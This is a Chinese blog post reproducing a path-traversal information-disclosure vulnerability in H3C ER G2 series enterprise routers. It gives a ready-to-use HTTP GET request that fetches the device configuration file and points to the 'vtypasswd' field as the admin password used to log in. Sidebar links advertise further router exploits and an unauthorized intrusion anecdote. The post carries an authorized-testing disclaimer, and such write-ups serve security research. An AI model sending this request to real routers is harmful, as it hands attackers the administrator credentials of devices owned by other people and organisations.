H3C ER G2系列路由器信息泄露漏洞

已于 2023-12-15 10:40:20 修改
阅读量1.8k 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络 web安全 网络安全 安全
于 2023-12-15 10:30:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/135003467
版权

H3C ER G2系列路由器信息泄露漏洞

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。该系列版本设备存在信息泄露漏洞,攻击者可通过该漏洞读取服务器敏感信息。

漏洞影响

ER2200G2、ERG2-450W、ERG2-1200W、ERG2-1350W、NR1200W<R1114 、ER3100G2、ER3200G2、ER3260G2、ER5100G2、ER5200G2、ER6300G2、ER8300G2、ER8300G2

漏洞危害

攻击者利用该漏洞获取敏感信息,从而登录控制台。

漏洞页面

在这里插入图片描述

漏洞复现

1. 构造poc

GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: ip:port
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS: ER2200G2.cfg要按照你的h3c型号填写

2. 发生数据包,获取密码

在这里插入图片描述vtypasswd就是密码

3. 登录系统

在这里插入图片描述

在这里插入图片描述

漏洞复现】H3C 路由器系列信息泄露漏洞
晚风不及你
02-19 3124
H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
H3C系列路由器存在前台RCE漏洞(含批量验证poc)
weixin_43567873的博客
04-05 1850
H3C系列路由器存在前台RCE漏洞(含批量验证poc)
H3C ER G2系列路由器敏感信息泄露漏洞
故事讲予风听
09-20 2471
H3C ER2200G2H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
H3C路由器userLogin.asp信息泄漏漏洞-类型补充
最新发布
weixin_45100060的博客
08-06 742
华三家用路由器配置泄露
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 5184
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
nglj9527的博客
05-22 1357
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码。
h3c系列路由器存在任意用户登录漏洞
m0_49025459的博客
08-28 4582
也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。密码就在vtypasswd之后,账户一般都是admin。根据根据系统名修改payload。发送请求包,获取管理员账号密码。
h3c路由器密码破解
08-29
针对忘记H3C路由器密码的企业网管以及感兴趣的各位同行,也许对你们有帮助哦。
HG532e路由器远程命令执行漏洞复现
qq_41326328的博客
09-29 2345
最近一直在复现关于路由器漏洞,前俩天复现了D-link的某款溢出漏洞,感觉做起来有很多坑,一般都是搭建环境造成的坑,在这以华为HG532e的远程命令执行的漏洞做出详细的步骤,供大家参考。我是个IOT新手,发文章一来是想把自己的实验记录一下,二来能够分享和交流一下技术和经验。
H3C ER G2系列路由器用户手册
04-11
H3C ER G2系列路由器用户手册中包含的知识点非常多,下面详细介绍这些知识点: 首先,手册是关于H3C ER G2系列高性能企业级路由器的用户手册,是由新华三技术有限公司发布的。该手册的版本为6W108-***,且涵盖了H3C...
H3C路由器 ER G2G3系列路由器.zip
02-28
目录 SOHO路由&&Mm无线常见问题排查pptx H3CSRG2&G3列路由器日常维护...H3CERG3系列路由器用户TA4Q602整本手册pdf H3CERG3系列路由器典型配置案集G00-整本手pdf H3CERHMG2&G3MIB companion.doc ER-ERG2系列产量培训pptx
H3C ER G2系列高性能企业级路由器 用户手册-6W111-整本手册.pdf
07-28
H3C ER G2系列高性能企业级路由器用户手册》作为用户全面掌握和有效管理H3C ER G2路由器的重要参考资料,不仅提供了详细的操作指南,还包含了丰富的信息和知识。从基础的设备介绍到高级的网络管理技巧,手册都有...
H3C ER G2系列路由器 最新版本软件
01-17
1. 202210311358 · 问题现象:ERG2管理MiniAP,概率出现日志显示“AP连接出错”,AP会重新上下线一次。 · 问题出现条件: 无明确触发条件,设备正常运行期间可能出现; 2. 202210121280 ...· 问题现象:R1120及...
H3C ER8300G2-X ER8300G2 ERHMG2-MNW100-R1122
07-27
2. H3C ER8300G2路由器ER8300G2ER8300G2-X同属一个系列,是H3C的高端企业级路由器产品。它同样拥有强大的数据处理能力和丰富的接口类型,支持多种网络协议和服务,适用于大型企业的分支互联和数据中心互连。与...
H3C任意命令执行漏洞
热门推荐
战神/calmness的博客
05-23 1万+
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
利用H3C ER5100权限绕过漏洞***内网
weixin_34082695的博客
04-05 2884
昨天在老婆单位门口等老婆下班回家。在车里没事,决定给老婆单位做一个免费的***测试服务。因为老婆在某豪华车4S店工作,她们单位的WiFi信号隔着一条马路还是满格。虽然用的是WPA/WPA2加密。使用Aircrack-ng直接截获密码文件,上传到我用树莓派搭建的“24小时开机大数据社工库暨超牛逼彩虹表破解平台”用了不到十分钟就跑了出来,8位纯数字,我只能说呵呵。跟老婆打电话,...
记一次 H3C ER3260 G2 路由器CPU暴涨 处理过程。
w294954902的博客
09-08 2480
公司路由器CPU突然暴涨,90%以上,已持续有两周左右。 症状是办公网网速下降,点击路由器配置页面反应慢,偶尔会出现拨号失败全公司断网。 网络环境:路由器上划分了3个vlan,分别对应服务器区,办公区,无线。. 带机量:正常办公,在线主机120个左右,包括手机,笔记本,服务器,办公电脑。 一、日志级别默认是informational,查看系统日志无异常,调至debug,等1天之后发现WAN2口流量异常(WAN2出口带宽20M)。 二、使用路由器自带抓包功能抓包,WAN2口无异常,VLA
远程重启h3c路由器_Oracle WebLogic远程代码执行漏洞(CVE20202546、CVE20202551)威胁通告...
weixin_39535217的博客
12-12 730
漏洞综述关于WebLogic ServerWebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。安全公告2020年1月15日,Oracle官方发布了2020年1月关键补丁更新,包含了家族多个产品的安全漏洞公告。其中有两个跟Oracle ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值